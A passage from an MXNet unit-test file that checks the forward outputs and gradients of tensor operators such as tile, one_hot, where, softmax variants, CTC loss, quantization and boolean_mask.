for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
        assert (expect_out == out).all()  # elementwise equality; comparing .all() of each side separately is always true
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
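    # force safe accumulation on, except on Windows where only a value already set in the environment is honoured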
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
    for i in range(seq_len * batch_size):
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')  # pad with -1 when blank is last; with 0 when labels are shifted up for a leading blank
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
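        # Pad two extra time steps with NaNs past the true sequence length (5); with use_data_lengths=True they must be ignored and receive zero gradient.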
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
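def _demo_int8_quantization_mapping():
    # Illustrative sketch, not part of the test suite: a symmetric int8
    # mapping consistent with the expected values above (an assumption for
    # illustration, not a spec of contrib.quantize):
    #   q  = round(127 * x / max(|min0|, |max0|))
    #   x' = q * max(|min0|, |max0|) / 127
    x = np.array([[0.1392, 0.5928], [0.6027, 0.8579]])
    scale = 127.0 / max(abs(0.0), abs(1.0))
    q = np.round(x * scale)  # [[18, 75], [77, 109]], matching qa_real
    x_back = q / scale       # close to a_real up to rounding
    return q, x_back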
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# gradients accumulate across the T backward passes because grad_req='add'
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
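def _demo_central_difference_near_zero():
    # Illustrative sketch, not part of the test suite: why inputs with
    # |x| < ~6*eps are replaced above. For f(x) = 1/x the central difference
    # (f(x+eps) - f(x-eps)) / (2*eps) equals -1/(x**2 - eps**2) exactly, so
    # its relative error is eps**2 / (x**2 - eps**2) and blows up near eps.
    eps = 2**(-11)
    errs = []
    for x in (1.0, 10 * eps, 3 * eps):
        numeric = (1. / (x + eps) - 1. / (x - eps)) / (2 * eps)
        analytic = -1. / x**2
        errs.append(abs(numeric - analytic) / abs(analytic))
    return errs  # roughly 2.4e-7, 1.0e-2, 1.3e-1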
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
